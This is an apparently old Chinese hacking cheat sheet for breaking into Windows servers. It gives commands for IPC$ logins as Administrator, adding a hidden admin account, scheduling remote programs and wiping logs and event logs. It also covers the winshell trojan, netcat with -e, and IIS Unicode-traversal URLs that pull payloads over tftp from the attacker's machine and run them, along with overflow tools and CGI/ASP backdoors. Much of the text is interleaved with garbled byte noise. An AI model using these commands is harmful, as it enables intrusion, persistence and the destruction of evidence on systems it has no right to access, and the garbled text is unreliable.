网管和黑客都必须知道的命令
%�dttE)oH? 常用的几条NET命令:
�+��c$I&JO �B$a-og(�� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
8�OFj0S1r` \:�_3i�\2p (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
o�y\B;aA�K H3KTi�r"on (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
nHst�/�5dA <� n?�=�|g (查看远程主机时间) net time \\IP地址
cy3Td2�8, �EbK�0�j?� (定时启动某个程序) at \\IP地址 02:18 readme.exe
Sre�YJT��% c$H+g,7xQ- (查看共享) net view \\IP地址
p]�gT&[iJ� `��E`HVZ�} (查看netbios工作组列表) nbtstat -A IP地址
�M"Y�0�jQ(
"�lV�q�U� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
l�|�"6yB | [M+�tB"��_ (这两条把自己增加到管理员组): net user 用户名 密码 /add
,T�5u��'"; �I�0�Ia6w9 net localgroup Administrators 用户名 /add
_��eQ�-�`? HZjf��`eM, (断开连接) net use \\IP地址\ipc$ /delete
S\ �,�mR4: 4_=Ja2v8;` 扫尾:
!]��koS�w} @F5f"�8!.\ del C:\winnt\system32\logfiles\*.*
<nHkg<O6�Y f@ `�*�>�" del C:\winnt\ssytem32\config\*.evt
y�I�;"9��G "V�UY�h$=[ del C:\winnt\system32\dtclog\*.*
��[0@�`�wZ �@!%n$>p/V del C:\winnt\system32\*.log
�dF��@)M� �+}k��gQ^� del C:\winnt\system32\*.txt
k�2^�a$k�} ��j;nb�?;� del C:\winnt\*.txt
`dkV�_ O0 [�xlIG}e9� del C:\winnt\*.log
��1�y�"3�� @�4GA^��h� 一、netsvc.exe
�Z|m`7xeCy 4ne5=�YY�* 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
9<1F[SS<s9 TJ��_=1Y@z netsvc /list \\IP地址
X`�r*���ob :}}%#�/nd netsvc schedule \\IP地址 /query
iz^q�R={bW �|�(R5�e� netsvc \\IP地址 schedule /start
�Z�j9�c�9� C*kK)6v�`� 二、OpenTelnet.exe
Kuw�^�q�X" C"V%�# ��K 远程启动主机的Telnet服务,并绑定端口到7878,例如:
[3>GGX[I�c [�0;buVU. OpenTelnet \\IP地址 用户名 密码 1 7878
6z,Dyy]tl� GF<[���}�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
V2�d,ksKwn m@G� i6��� telnet IP地址 7878
d5m`Bm-{� '�0aG
�N<c 三、winshell.exe
+Oa�UP*\Dd /pH(WHT+/H 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
+�%*&.�@z_ Qs 2��.ef? p Path (查看winshell主程序的路径信息)
<,�@%*�G1- #��J\rv'� b reBoot (重新启动机器)
*�|:Q%x�r- /�Ft:ffR|R d shutDown (关闭机器)
V�e��3 ;�� n(ir[w#,]" s Shell (执行后你就会看到可爱的“C:\>”)
�EMvHFu�
� ,XK�Cz ]8V x eXit (退出本次登录会话,此命令并不终止winshell的运行)
sH#�X�0fG _=f=f���cl CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
epD?�K��� �b�'p4w�E> 四、3389登陆器,GUI方式登录远程主机的
�"j�g@w�%~ +b$S~�0n
� 五、elsave.exe
#CUz��u�k& QV|>4�^1D� 事件日志清除工具
1+kE�!2b;b C"�uahP[Y� elsave -s \\IP地址 -l "application" -C
Y$
Fj2nk+ .8�gl�< vX elsave -s \\IP地址 -l "system" -C
f� i~I@KJ> ]�wn/BG)� elsave -s \\IP地址 -l "security" -C
/8yn�vhF# Q�rY�a%D+� 执行后成功清除应用程序日志,系统日志,安全日志
eC�b�f�9B� p^)B0[�P�9 六、hbulot.exe
]1`g^�Z@ 0 ��
��� WY� 开启win2kserver和winxp的3389服务
�[j,txe?�n Y��g|lq9gD hbulot [/r]
jQs>`P-CM� �e)^�j+� l 使用/r表示安装完成后自动重起目标使设置生效。
s<QkDERM�X F3U`�ue��P 七、nc.exe(netcat.exe)
a��|j�%�n� 0S/'�
94%w 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
fRZ KEI�yk ^�-)txC5{T 想要连接到某处: nc [-options] hostname port[s] [ports] ...
GRqT-�/�n" 77 �r(*.O| 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
n`7f"'�/�: P�A�;6$vqX 参数:
�{d�3<�W N vXj����<� -e prog 程序重定向,一旦连接,就执行 [危险!!]
Q+q��,�!w8 �63�WS7s"� -g gateway source-routing hop point[s], up to 8
L�����,[;k k\r(=cex6 -G num source-routing pointer: 4, 8, 12, ...
?knYY>Kzh1 /*)�Tl� � -h 帮助信息
%D�}H|*IPu 4$6T+i2E
� -i secs 延时的间隔
}CGSEr4'w~ /s:f�W�+�C -l 监听模式,用于入站连接
bJ /5�|E?� _D7�]-3uC! -n 指定数字的IP地址,不能用hostname
JC?N_�kP%W ^�]C&tG0 ! -o file 记录16进制的传输
]88];?�KS} �!�c#]?b%� -p port 本地端口号
v;1F[?�@3Y n�'�FwM\�� -r 任意指定本地及远程端口
J�%C#V}z7E �KDP H6��� -s addr 本地源地址
C(T;>if0NH C#pZw����[ -u UDP模式
�>ezi3Zx�^ 5I�I(�mSg8 -v 详细输出——用两个-v可得到更详细的内容
2;3�f��=$3 K�n;D?i�oY -w secs timeout的时间
��&�BE
��g vV?r�p�e|% -z 将输入输出关掉——用于扫描时
c"tJld5F�_ 八、TFTPD32.EXE
vdDludE�v� �XM���1`x� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
q�O1tj'U�< \00DqL(Oj` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
v�xQ8t!-u ~p�0�c3*� 然后可以直接令文件运行:
una%[jTc�� g|� <wyt�[ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
{XurC}�#�\ R<ND=[�}s� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Bf`9V�71�3 �=WZqQq��{ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��5~�sx:0; 07�g':QU@� 一、一 Xscan命令行运行参数说明:
�sZ�gRt��� "Ml&[O�ge 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
B?rSj�dY4� BQ</�g* $; 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
D('2p8;2"7 `?(Bt�|<�> xscan -file <主机列表文件名> <检测项目> [其他选项]
U5��H�KRO Hmm�S��(fU 其中<检测项目> 含义如下:
g9fq�5E<G� 3�uu~�p!2 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�<b���ck~E �&QX`N�O�6 -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�e�?0q�9�W �L)QE��`24 -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
S8F�my�1#� YV4#%I!<�� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
(�6p��]ZY #zUX�yT#�X -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
"[p@tc?5�� �rZPT8�9M6 [其他选项] 含义如下:
N/�QiI.V�6 LK9�g0_��� -v: 显示详细扫描进度
$4FX(O0�Q@ 8e~|.wOL� -p: 跳过Ping不通的主机
g?v\�!/~(u �?jQ]��(i& -o: 跳过没有检测到开放端口的主机
:p&!�RI(l �W=B�"Q
qL -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
